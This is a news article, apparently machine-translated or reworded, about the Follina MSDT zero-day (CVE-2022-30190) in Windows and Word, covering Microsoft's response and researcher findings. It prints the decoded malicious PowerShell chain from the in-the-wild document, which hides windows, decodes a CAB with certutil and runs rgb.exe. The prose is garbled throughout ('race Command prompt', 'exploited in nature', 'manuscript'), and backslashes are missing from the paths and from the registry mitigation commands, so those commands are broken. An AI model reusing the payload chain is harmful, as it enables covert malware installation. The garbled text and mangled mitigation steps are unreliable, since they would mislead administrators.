A zero-day critical code execution in all supported versions of Windows has been under active use for seven weeks, giving attackers a reliable means of installing malware without triggering Windows Defender and a list of other endpoint protection products.
Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day already exploited in nature, say researchers from Shadow Chaser Group said on Twitter. ONE response of 21 Aprilhowever, the researchers informed that the Microsoft Security Response Center team did not consider the reported behavior to be a security vulnerability because the MSDT Diagnostic Tool allegedly required a password before it could perform payloads.
Uh, no matter
On Monday, Microsoft reversed the course, identified the behavior with the vulnerability tracker CVE-2022-30190 and warned for the first time that the reported behavior, after all, posed a critical vulnerability.
“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the statement said. “An attacker who successfully exploited this vulnerability could run arbitrary code with the rights of the calling application. The attacker could then install programs, view, modify or delete data, or create new accounts in the context allowed by the user’s rights.”
At the time of this story’s release, Microsoft had not yet released a patch. Instead, it advised customers to disable the MSDT URL protocol by:
- race Command prompt as Administrator.
- To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT ms-msdt filename“
- Execute the command “reg delete HKEY_CLASSES_ROOT ms-msdt / f”
Although it was originally missed by Microsoft, the vulnerability was rediscovered when a researcher identified a Word document uploaded to VirusTotal last Friday, utilizing the unprecedented attack vector.
According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI schema to load and execute PowerShell commands.
“It should not be possible,” Beaumont wrote.
Unfortunately, that is possible.
Once the commands in the document are decoded, they are translated into:
$cmd = "c:windowssystem32cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
According to researcher John Hammond from the security company Huntress, the manuscript is:
- Launches hidden windows to:
- Kill msdt.exe if it is running
- Browse files inside a RAR file, looking for a Base64 string for an encoded CAB file
- Save this Base64 encoded CAB file as 1.t
- Decode the Base64 encoded CAB file to be saved as 1.c
- Expand 1.c CAB file in the current directory, and finally:
- Perform rgb.exe (probably compressed inside the 1.c CAB file)
Beaumont also drew attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. This suggests that there was at least one other time the company’s security team failed to understand the potential for this behavior to be maliciously exploited.
No, Protected View does not save you
Usually, Word is set up to load content downloaded from the Internet into what is called protected view, a mode that disables macros and other potentially harmful features. For reasons that are not clear, Beaumont said if the document is loaded as a Rich Text Format file, “it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.
In other words, Huntress researchers wrote, the RTF file could “trigger the call of this exploit with only the Windows Explorer preview pane.” In doing so, “this expands the severity of this threat by not just ‘single-clicking’ to exploit, but potentially with a ‘zero-click’ trigger.”
In addition to the document that was uploaded to VirusTotal on Friday, researchers revealed a separate Word file that was uploaded on April 12, which utilizes the same zero-day.
Given the severity of this unrecovered vulnerability, organizations that rely on Microsoft Office should carefully examine how it affects their networks. Disabling the MSDT URL protocol is unlikely to cause major disruption in the short term and possibly in the long term. While researching – at least until Microsoft releases more details and guidance – Office users should turn off the protocol altogether and give further examination to all documents downloaded over the Internet.